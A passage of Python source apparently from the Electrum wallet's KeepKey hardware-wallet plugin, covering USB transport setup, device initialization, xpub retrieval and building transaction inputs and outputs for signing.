return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|